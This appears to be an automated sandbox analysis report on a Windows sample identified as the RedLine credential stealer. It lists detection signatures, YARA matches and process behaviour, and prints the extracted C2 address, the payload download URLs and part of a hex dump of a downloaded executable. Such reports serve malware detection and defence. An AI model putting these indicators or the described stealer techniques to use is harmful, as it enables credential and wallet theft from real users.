Play interactive tour

Edit tour

Windows Analysis Report VYeSXonMT1.exe

Overview

General Information

Sample Name:	VYeSXonMT1.exe
Analysis ID:	528743
MD5:	0e852a9d4e42120623c0112e53f70992
SHA1:	980fed1b88c494360a3eaad95fd3da046bb85f6e
SHA256:	6c00faff9e01fa7fe3a9a681658c61b4802817a91b74351f7a3e6ad19540f9f1
Tags:	exeRedLineStealer
Infos:
Most interesting Screenshot:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Yara detected Evader

Detected unpacking (overwrites its own PE header)

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Connects to many ports of the same IP (likely port scanning)

Machine Learning detection for sample

May check the online IP address of the machine

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Creates HTML files with .exe extension (expired dropper behavior)

Contains functionality to register a low level keyboard hook

Sample or dropped binary is a compiled AutoHotkey binary

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Machine Learning detection for dropped file

Yara detected Autohotkey Downloader Generic

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to simulate keystroke presses

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

OS version to string mapping found (often used in BOTs)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Internet Provider seen in connection with other malware

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to communicate with device drivers

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Enables debug privileges

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Contains functionality to launch a program with higher privileges

Potential key logger detected (key state polling based)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Contains functionality to simulate mouse events

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

Process Tree

System is w10x64

VYeSXonMT1.exe (PID: 6972 cmdline: "C:\Users\user\Desktop\VYeSXonMT1.exe" MD5: 0E852A9D4E42120623C0112E53F70992)

mopnns.exe (PID: 6312 cmdline: mopnns.exe MD5: 3F91E0102D6832F36DA2D908672B2266)

cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.215.113.15:21508"], "Bot Id": "mix25.11"}

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.405540255.00000000004CE000.00000040.00020000.sdmp	JoeSecurity_AutohotkeyDownloaderGeneric	Yara detected Autohotkey Downloader Generic	Joe Security
00000000.00000002.405540255.00000000004CE000.00000040.00020000.sdmp	JoeSecurity_Evader	Yara detected Evader	Joe Security
00000004.00000002.468644721.0000000002185000.00000004.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000002.476408687.0000000004F40000.00000004.00020000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.475297379.00000000049D0000.00000004.00020000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.406187807.0000000003A41000.00000040.00000001.sdmp	JoeSecurity_AutohotkeyDownloaderGeneric	Yara detected Autohotkey Downloader Generic	Joe Security
00000000.00000002.406187807.0000000003A41000.00000040.00000001.sdmp	JoeSecurity_Evader	Yara detected Evader	Joe Security
00000004.00000003.402292014.000000000074A000.00000004.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000003.374963665.0000000003B10000.00000004.00000001.sdmp	JoeSecurity_AutohotkeyDownloaderGeneric	Yara detected Autohotkey Downloader Generic	Joe Security
00000000.00000003.374963665.0000000003B10000.00000004.00000001.sdmp	JoeSecurity_Evader	Yara detected Evader	Joe Security
Process Memory Space: VYeSXonMT1.exe PID: 6972	JoeSecurity_AutohotkeyDownloaderGeneric	Yara detected Autohotkey Downloader Generic	Joe Security
Process Memory Space: VYeSXonMT1.exe PID: 6972	JoeSecurity_Evader	Yara detected Evader	Joe Security
Process Memory Space: mopnns.exe PID: 6312	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: mopnns.exe PID: 6312	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author
4.2.mopnns.exe.49d0ee8.4.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.3.mopnns.exe.74ac80.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.2.mopnns.exe.21c54fe.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.2.mopnns.exe.4f40000.6.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.3.mopnns.exe.74ac80.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.2.mopnns.exe.49d0ee8.4.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.2.mopnns.exe.21c54fe.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.2.mopnns.exe.21c63e6.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.2.mopnns.exe.49d0000.5.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.2.mopnns.exe.4f40000.6.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.2.mopnns.exe.49d0000.5.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.2.mopnns.exe.21c63e6.3.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.VYeSXonMT1.exe.400000.0.unpack	JoeSecurity_AutohotkeyDownloaderGeneric	Yara detected Autohotkey Downloader Generic	Joe Security
0.2.VYeSXonMT1.exe.400000.0.unpack	JoeSecurity_Evader	Yara detected Evader	Joe Security
Click to see the 9 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 4.2.mopnns.exe.49d0000.5.raw.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["185.215.113.15:21508"], "Bot Id": "mix25.11"}

Multi AV Scanner detection for submitted file

Show sources

Source: VYeSXonMT1.exe

Virustotal: Detection: 50%

Perma Link

Multi AV Scanner detection for domain / URL

Show sources

Source: http://blairwitch.top/work/mix.exe

Virustotal: Detection: 12%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe

ReversingLabs: Detection: 82%

Machine Learning detection for sample

Show sources

Source: VYeSXonMT1.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe

Joe Sandbox ML: detected

Source: 0.2.VYeSXonMT1.exe.3990e50.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.VYeSXonMT1.exe.3a60000.0.unpack	Avira: Label: TR/Patched.Ren.Gen

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Unpacked PE file: 0.2.VYeSXonMT1.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Unpacked PE file: 4.2.mopnns.exe.400000.0.unpack

Source: VYeSXonMT1.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: unknown	HTTPS traffic detected: 5.9.162.45:443 -> 192.168.2.6:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.9.162.45:443 -> 192.168.2.6:49769 version: TLS 1.2

Source:	Binary string: _.pdb source: mopnns.exe, 00000004.00000002.468644721.0000000002185000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.475297379.00000000049D0000.00000004.00020000.sdmp, mopnns.exe, 00000004.00000003.402292014.000000000074A000.00000004.00000001.sdmp
Source:	Binary string: C:\xohare dolihupabimig\kaluyix\73.pdb source: VYeSXonMT1.exe
Source:	Binary string: C:\bol\voge hixolub\yebu\losevoduzih-fayipa\weginitowa\gevopit.pdb source: mopnns.exe, 00000004.00000000.396223546.0000000000438000.00000002.00020000.sdmp, mopnns.exe.0.dr
Source:	Binary string: C:\xohare dolihupabimig\kaluyix\73.pdbP source: VYeSXonMT1.exe
Source:	Binary string: 5C:\bol\voge hixolub\yebu\losevoduzih-fayipa\weginitowa\gevopit.pdb0= source: mopnns.exe, 00000004.00000000.396223546.0000000000438000.00000002.00020000.sdmp, mopnns.exe.0.dr

Spreading:

Yara detected Autohotkey Downloader Generic

Show sources

Source: Yara match	File source: 0.2.VYeSXonMT1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.405540255.00000000004CE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.406187807.0000000003A41000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374963665.0000000003B10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VYeSXonMT1.exe PID: 6972, type: MEMORYSTR

Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_004770E0 FindFirstFileW,FindClose,GetFileAttributesW,
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_00477170 _wcschr,_wcschr,_wcschr,FindFirstFileW,FindClose,_wcschr,FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_00444070 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_004443B0 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

Networking:

Connects to many ports of the same IP (likely port scanning)

Show sources

Source: global traffic

TCP traffic: 185.215.113.15 ports 21508,0,1,2,5,8

May check the online IP address of the machine

Show sources

Source: C:\Users\user\Desktop\VYeSXonMT1.exe	DNS query: name: iplogger.org
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	DNS query: name: iplogger.org

Creates HTML files with .exe extension (expired dropper behavior)

Show sources

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

File created: arinesp.exe.0.dr

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Nov 2021 17:23:43 GMTServer: Apache/2.4.38 (Debian)Last-Modified: Wed, 24 Nov 2021 20:15:01 GMTETag: "47600-5d18e834737b3"Accept-Ranges: bytesContent-Length: 292352Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 03 34 fe 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 6a 03 00 00 66 01 00 00 00 00 00 9b 2c 00 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 04 00 00 04 00 00 a3 a7 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 ef 03 00 78 00 00 00 00 70 04 00 78 75 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 81 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 9c 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 69 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 26 78 00 00 00 80 03 00 00 7a 00 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 62 00 00 00 00 04 00 00 18 00 00 00 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 75 00 00 00 70 04 00 00 76 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	IP Address: 185.215.113.15 185.215.113.15
Source: Joe Sandbox View	IP Address: 185.215.113.15 185.215.113.15

Source: global traffic

TCP traffic: 192.168.2.6:49772 -> 185.215.113.15:21508

Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: VYeSXonMT1.exe, 00000000.00000002.405540255.00000000004CE000.00000040.00020000.sdmp, VYeSXonMT1.exe, 00000000.00000002.406356818.0000000003F70000.00000004.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.406187807.0000000003A41000.00000040.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000003.374963665.0000000003B10000.00000004.00000001.sdmp	String found in binary or memory: http://blairwitch.top/jollion/apines.exe
Source: VYeSXonMT1.exe, 00000000.00000002.406204176.0000000003A60000.00000004.00000001.sdmp	String found in binary or memory: http://blairwitch.top/jollion/apines.exearinesp.exe?
Source: VYeSXonMT1.exe, 00000000.00000002.406356818.0000000003F70000.00000004.00000001.sdmp	String found in binary or memory: http://blairwitch.top/jollion/apines.exet
Source: VYeSXonMT1.exe, 00000000.00000002.406411252.0000000003FD0000.00000004.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.405540255.00000000004CE000.00000040.00020000.sdmp, VYeSXonMT1.exe, 00000000.00000002.406187807.0000000003A41000.00000040.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000003.374963665.0000000003B10000.00000004.00000001.sdmp	String found in binary or memory: http://blairwitch.top/work/mix.exe
Source: VYeSXonMT1.exe, 00000000.00000002.406411252.0000000003FD0000.00000004.00000001.sdmp	String found in binary or memory: http://blairwitch.top/work/mix.exe5
Source: VYeSXonMT1.exe, 00000000.00000002.406204176.0000000003A60000.00000004.00000001.sdmp	String found in binary or memory: http://blairwitch.top/work/mix.exemopnns.exe?
Source: VYeSXonMT1.exe, 00000000.00000002.406411252.0000000003FD0000.00000004.00000001.sdmp	String found in binary or memory: http://blairwitch.top/work/mix.exep
Source: VYeSXonMT1.exe, 00000000.00000002.406356818.0000000003F70000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	String found in binary or memory: http://forms.rea
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	String found in binary or memory: http://go.micros
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
